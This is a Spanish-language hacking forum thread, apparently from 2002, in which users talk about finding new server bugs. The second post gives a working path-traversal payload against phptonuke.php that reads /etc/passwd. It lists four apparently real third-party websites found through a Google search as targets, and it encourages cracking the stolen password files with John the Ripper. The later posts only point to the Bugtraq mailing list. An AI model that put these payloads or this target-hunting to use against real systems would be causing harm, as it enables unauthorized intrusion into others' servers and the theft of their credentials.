Resultados 1 al 4 de 4

Tema: bug...

  1. #1 bug... 
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    tengo una duda...
    yo leo todo lo k pillo sobre el tema de los bugs en servidores..., pero la verdad, es k desde el bug del unicode no ha salio na nuevo....
    me gustaria saber si hay algun nuevo bug...
    un saludo a todos!!!!
    Citar  
     

  2. #2  
    Medio
    Fecha de ingreso
    Aug 2002
    Mensajes
    100
    Descargas
    0
    Uploads
    0
    Mira este para los php-nuke:

    -----------------

    Salio el advisory en la bugtraq, basicamente..... es un php con la capacidad de 'encuadernar' un archivo, dentro de un diseño predefinido.

    http://site.ar/phptonuke.php?filnavn=/docs.html

    Ahora.... que pasa si en vez de llamar a 'docs.html' llamamos a...

    http://site.ar/phptonuke.php?filnavn=/etc/passwd ???

    En 4 encontre estos sites via google ( "phptonuke.php" )....


    http://www.goodgame.org/phptonuke.ph...vn=/etc/passwd
    http://ns.csb.cz/slavistickenoviny/p...vn=/etc/passwd
    http://www.slavistickenoviny.cz/phpt...vn=/etc/passwd
    http://www.agrexive.de/phptonuke.php...vn=/etc/passwd


    Por mas q los pass esten shadow, la idea es testear y darnos cuenta de las cosas q se pueden aprovechar.......

    Solo pasarlos a un txt, john y.... lo demas es cosa vuetra...

    -----------------------

    De esta vulnerabilidad me entere por Bladec, posteriormente la busque y encontre este post de Cyervo que la explicaba

    No se cuantos sitios pueden tener este bug pues no se a que php-nuke pertenece y si las nuevas versiones traen este bug.

    Cuestion de probar.

    y referente a que no hay mas bugs...... xDDDDD

    Apuntate a la lista del Bugtraq y veras...

    Saludos
    "Quien se mete con el mejor muere como todos los demas" Zero Cool
    Citar  
     

  3. #3  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    ostia k majo, me podrias decir k tengo k hacer para apuntarme a la lista del bugtraq, k n se ni lo k es...graicas por todo
    Citar  
     

  4. #4  
    Ex-moderador
    Fecha de ingreso
    Apr 2002
    Mensajes
    3.184
    Descargas
    0
    Uploads
    0
    securityfocus.org

    Yo estoy suscrito a todas las listas y de vez en cuando participo en ellas.

    TseTse
    ' La corrupción, el síntoma más infalible de la libertad que otorga la Constitución '
    Citar  
     

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •